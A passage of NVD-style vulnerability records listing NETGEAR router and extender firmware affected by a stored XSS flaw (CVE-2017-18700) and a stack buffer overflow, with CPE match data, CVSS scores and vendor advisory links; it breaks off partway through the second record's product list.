2020-04-24 15:15
Modified
2024-11-21 03:20
Severity ?
Summary
Certain NETGEAR devices are affected by stored XSS. This affects D6400 before 1.0.0.60, D7000 before 1.0.1.50, D8500 before 1.0.3.29, EX6200 before 1.0.3.84, EX7000 before 1.0.0.60, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.01.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.36, R6900 before 1.0.1.34, R6900P before 1.3.0.8, R7000 before 1.0.9.14, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.56, R7900 before 1.0.1.26, R8000 before 1.0.4.4, R8300 before 1.0.2.106, R8500 before 1.0.2.106, R9000 before 1.0.2.52, WNDR3400v3 before 1.0.1.16, WNR3500Lv2 before 1.2.0.46, and WNDR3700v5 before 1.1.0.48.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2D1F0B30-4BB4-4573-BE0D-381B31CD2A36",
"versionEndExcluding": "1.0.0.60",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4A94DD9D-0F07-4FD7-B1B0-1DD1E319B092",
"versionEndExcluding": "1.0.1.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AF04B65B-9685-4595-9C71-0F77AD7109BE",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "20564DE0-E58D-4628-ADD6-AC7C90AD85F7",
"versionEndExcluding": "1.0.3.29",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D4BC0A4D-0C9D-47AD-9A9A-3416E812EC7D",
"versionEndExcluding": "1.0.3.84",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3186CC67-B567-4A0C-BD2C-0433716FBD1B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "42A19A73-B5FC-4D14-82D0-2128D3E7178B",
"versionEndExcluding": "1.0.0.60",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F45B620-60B8-40F3-A055-181ADD71EFFF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F5E7A8CA-134F-49B4-95D6-79A88CD6BB80",
"versionEndExcluding": "1.0.4.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "55058831-92FF-4A87-8340-E25AC0DDF89E",
"versionEndExcluding": "1.0.4.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "54D9B854-7E18-439E-8FD2-C0EC88DA6222",
"versionEndExcluding": "1.01.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DDC0DA75-5EB9-4F53-99A9-798FFBFD0C15",
"versionEndExcluding": "1.0.2.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "442F153C-737B-44D4-9A6D-EB6F6C47B986",
"versionEndExcluding": "1.0.1.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "81F70E0C-3674-4981-B815-0721F6C6E588",
"versionEndExcluding": "1.0.1.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "326BBECA-9A76-4A3E-90F7-023797D5D186",
"versionEndExcluding": "1.3.0.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CDE61DB5-86A6-4810-91CC-18D05DC09507",
"versionEndExcluding": "1.0.9.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "09963BE1-D57D-491A-9BD8-A1A46ED993E0",
"versionEndExcluding": "1.3.0.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2FB08FA1-A476-4E05-9904-9BE30C9E77B7",
"versionEndExcluding": "1.0.0.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F7508FAE-C117-4E21-8D3D-0016E25363DB",
"versionEndExcluding": "1.0.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0B72579C-51F1-4F16-8FDE-544229C25B07",
"versionEndExcluding": "1.0.1.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "78819A69-AF43-4741-AE4D-5FEC4280F25F",
"versionEndExcluding": "1.0.4.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BCE9CF95-192E-4D43-9DAD-2C8D9AF045E9",
"versionEndExcluding": "1.0.2.106",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4DFD7557-D13D-40EB-94AD-AF092CDE587A",
"versionEndExcluding": "1.0.2.106",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r9000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "679AAEA7-6415-4BBA-AE95-887C2CA609DC",
"versionEndExcluding": "1.0.2.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r9000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D74F1BFC-562E-4E7D-BBAB-2F8B593B5A57",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72DCD4C0-A757-4F98-97BD-FB1FEBF3235C",
"versionEndExcluding": "1.0.1.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB542F95-5AE2-47E4-BD7B-34134B26AA4F",
"versionEndExcluding": "1.2.0.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DD1F416B-C938-4AE3-B93E-03087575FF40",
"versionEndExcluding": "1.1.0.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3700:v5:*:*:*:*:*:*:*",
"matchCriteriaId": "EC5B6CB8-D439-42D5-ACAE-6246874EA5F0",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by stored XSS. This affects D6400 before 1.0.0.60, D7000 before 1.0.1.50, D8500 before 1.0.3.29, EX6200 before 1.0.3.84, EX7000 before 1.0.0.60, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.01.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.36, R6900 before 1.0.1.34, R6900P before 1.3.0.8, R7000 before 1.0.9.14, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.56, R7900 before 1.0.1.26, R8000 before 1.0.4.4, R8300 before 1.0.2.106, R8500 before 1.0.2.106, R9000 before 1.0.2.52, WNDR3400v3 before 1.0.1.16, WNR3500Lv2 before 1.2.0.46, and WNDR3700v5 before 1.1.0.48."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una vulnerabilidad de tipo XSS almacenado. Esto afecta a D6400 versiones anteriores a la versi\u00f3n 1.0.0.60, D7000 versiones anteriores a la versi\u00f3n 1.0.1.50, D8500 versiones anteriores a la versi\u00f3n 1.0.3.29, EX6200 versiones anteriores a la versi\u00f3n 1.0.3.84, EX7000 versiones anteriores a la versi\u00f3n 1.0.0.60, R6250 versiones anteriores a la versi\u00f3n 1.0.4.16, R6300v2 versiones anteriores a la versi\u00f3n 1.0.4.18, R6400 versiones anteriores a la versi\u00f3n 1.01.32, R6400v2 versiones anteriores a la versi\u00f3n 1.0.2.44, R6700 versiones anteriores a la versi\u00f3n 1.0.1.36, R6900 versiones anteriores a la versi\u00f3n 1.0.1.34, R6900P versiones anteriores a la versi\u00f3n 1.3.0.8, R7000 versiones anteriores a la versi\u00f3n 1.0.9.14, R7000P versiones anteriores a la versi\u00f3n 1.3.0.8, R7100LG versiones anteriores a 1.0.0.34, R7300DST versiones anteriores a la versi\u00f3n 1.0.0.56, R7900 versiones anteriores a la versi\u00f3n 1.0.1.26, R8000 versiones anteriores a la versi\u00f3n 1.0.4.4, R8300 versiones anteriores a la versi\u00f3n 1.0.2.106, R8500 versiones anteriores a la versi\u00f3n 1.0.2.106, R9000 versiones anteriores a la versi\u00f3n 1.0.2.52, WNDR3400v3 versiones anteriores a la versi\u00f3n 1.0.1.16, WNR3500Lv2 versiones anteriores a la versi\u00f3n 1.2.0.46 y WNDR3700v5 versiones anteriores a 1.1.0.48."
}
],
"id": "CVE-2017-18700",
"lastModified": "2024-11-21T03:20:41.837",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.1,
"impactScore": 2.7,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-24T15:15:12.363",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000053202/Security-Advisory-for-Stored-Cross-Site-Scripting-on-Some-Routers-Gateways-and-Extenders-PSV-2017-0342"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000053202/Security-Advisory-for-Stored-Cross-Site-Scripting-on-Some-Routers-Gateways-and-Extenders-PSV-2017-0342"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-16 22:15
Modified
2024-11-21 04:39
Severity ?
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D6220 before 1.0.0.46, D6400 before 1.0.0.80, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v1 before 1.0.0.58, DGN2200B before 1.0.0.58, JNDR3000 before 1.0.0.24, RBW30 before 2.1.4.16, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.42, R6400v2 before 1.0.2.56, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.32, R6900P before 1.3.1.44, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7000P before 1.3.1.44, R7900 before 1.0.2.16, R8000P before 1.4.0.10, R7900P before 1.4.0.10, R8300 before 1.0.2.122, R8500 before 1.0.2.122, R8000 before 1.0.4.18, WNDR3400v3 before 1.0.1.22, WNDR4500v2 before 1.0.0.72, WNR3500Lv2 before 1.2.0.54, WN3100RP before 1.0.0.20, and WN2500RPv2 before 1.0.1.54.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E6ABD67D-F08A-4879-A497-EA3DF0A87D4B",
"versionEndExcluding": "1.0.0.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "76FA59AE-35D5-443C-8C05-3989DD59B32F",
"versionEndExcluding": "1.0.0.80",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "52FB0300-0FC9-4797-BACB-84D7D932A386",
"versionEndExcluding": "1.0.0.51",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "D8780623-F362-4FA5-8B33-37E9CB3FEE12",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "629E89E8-F329-4D11-9652-540752084DD3",
"versionEndExcluding": "1.0.3.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "99288EE6-3A88-4134-992D-148868117AFC",
"versionEndExcluding": "1.0.0.58",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v1:*:*:*:*:*:*:*",
"matchCriteriaId": "F50D834B-D7B3-43D6-8072-8992FBC8C97B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "082AB982-1EF7-417D-88CD-21F3860AF8C4",
"versionEndExcluding": "1.0.0.58",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C85C6885-636D-4583-AEEF-FC23D93CCC35",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jndr3000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "07C1E707-AB63-4812-9BBC-7267AD17BFF9",
"versionEndExcluding": "1.0.0.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jndr3000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5DEEEEE5-0798-450E-BF9D-B17A15235C80",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbw30_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "583C272B-68C0-4727-884F-BF7759D829DB",
"versionEndExcluding": "2.1.4.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbw30:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FEA73D22-970D-45F2-81F3-9576C04CCC94",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5D1A9B6F-89B2-4785-A0E2-3FD322D6A28F",
"versionEndExcluding": "1.0.4.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "502055F1-F919-4C91-A3D0-B144027BC690",
"versionEndExcluding": "1.0.4.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "741413AB-9519-4BBE-BEDB-DFA2077BAF79",
"versionEndExcluding": "1.0.1.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "203541F7-8AC5-436A-808E-935B03B00E8D",
"versionEndExcluding": "1.0.2.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4E821B01-31C8-4766-BAAF-D814336617B9",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "08FF0010-66E3-485C-A22B-39E57E738550",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
